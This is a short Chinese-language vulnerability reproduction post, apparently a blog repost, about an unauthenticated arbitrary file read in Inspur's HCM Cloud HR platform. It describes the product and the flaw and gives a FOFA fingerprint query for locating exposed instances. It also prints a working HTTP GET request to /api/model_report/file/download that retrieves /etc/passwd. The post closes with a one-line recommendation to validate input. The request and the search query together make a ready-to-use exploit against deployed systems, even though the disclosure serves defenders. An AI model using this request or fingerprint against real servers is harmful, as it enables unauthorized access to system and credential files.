HCM-Cloud云端专业人力资源平台 download 任意文件读取漏洞复现

0x01 产品描述:

 ‌      浪潮HCM Cloud‌是由浪潮集团旗下的深圳浪潮早上班云技术有限公司开发的云端专业人力资源平台,专注于为大中型企业客户提供全SaaS人力资源服务化平台。该平台以人力资源服务化转型为驱动力,通过业务人力一体化,打造了全新的人力资源管理应用模式‌。
0x02 漏洞描述:

        HCM-Cloud云端专业人力资源平台 /download接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
0x03 搜索语句:

Fofa:icon_hash="-859381597"

0x04 漏洞复现:

GET /api/model_report/file/download?index=/&ext=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Connection: close


0x05 修复建议:

在处理客户端输入的参数时,进行严格的验证和过滤,防止未授权的文件访问。

猜你喜欢

转载自blog.csdn.net/xc_214/article/details/143424630